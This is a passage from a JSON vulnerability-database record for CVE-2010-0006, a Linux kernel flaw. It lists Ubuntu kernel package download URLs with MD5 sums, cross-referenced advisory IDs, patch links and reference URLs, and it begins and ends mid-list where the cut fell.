http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5:   601506 1b56c59b3df953a640760b876d752465\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5:   600680 166e5056f971d5fa031230c1af67d028\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb\n      Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   121954 75090ea655204cc898db4634fc8aa021\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   120960 8f63ad112de0797974650631dee53d13\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   184674 d704744a26941df63b9195288306fa7b\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "85610"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "37810",
        "trust": 2.8
      },
      {
        "db": "OSVDB",
        "id": "61876",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "38168",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38333",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/01/14/2",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-42611",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85473",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85610",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "85610"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "id": "VAR-201001-0659",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      }
    ],
    "trust": 0.43838382
  },
  "last_update_date": "2023-12-18T11:53:32.615000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-2.6.32.4",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "title": "linux-image-2.6.31-19-386_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5707"
      },
      {
        "title": "crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5711"
      },
      {
        "title": "linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5715"
      },
      {
        "title": "linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5719"
      },
      {
        "title": "nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5723"
      },
      {
        "title": "floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5624"
      },
      {
        "title": "plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5685"
      },
      {
        "title": "pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5628"
      },
      {
        "title": "input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5689"
      },
      {
        "title": "scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5632"
      },
      {
        "title": "fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5636"
      },
      {
        "title": "input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5640"
      },
      {
        "title": "md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5645"
      },
      {
        "title": "fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5649"
      },
      {
        "title": "linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5592"
      },
      {
        "title": "kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5653"
      },
      {
        "title": "block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5596"
      },
      {
        "title": "linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5657"
      },
      {
        "title": "linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5600"
      },
      {
        "title": "pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5661"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42611"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/37810"
      },
      {
        "trust": 2.5,
        "url": "http://www.osvdb.org/61876"
      },
      {
        "trust": 1.9,
        "url": "http://marc.info/?l=linux-netdev\u0026m=126343325807340\u0026w=2"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-january/034250.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/38168"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/38333"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2010/01/14/2"
      },
      {
        "trust": 1.7,
        "url": "http://bugs.gentoo.org/show_bug.cgi?id=300951"
      },
      {
        "trust": 1.7,
        "url": "http://cert.fi/en/reports/2010/vulnerability341748.html"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=2570a4f5428bcdb1077622342181755741e7fa60"
      },
      {
        "trust": 1.7,
        "url": "http://security-tracker.debian.org/tracker/cve-2010-0006"
      },
      {
        "trust": 1.7,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=555217"
      },
      {
        "trust": 0.8,
        "url": "http://www.cert.fi/en/reports/2010/vulnerability341748.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0006"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu571860/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0006"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2010-0006"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100141285"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/blog/71/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-netdev\u0026amp;m=126343325807340\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://admin.fedoraproject.org/updates/f12/fedora-2010-0823"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38168/"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
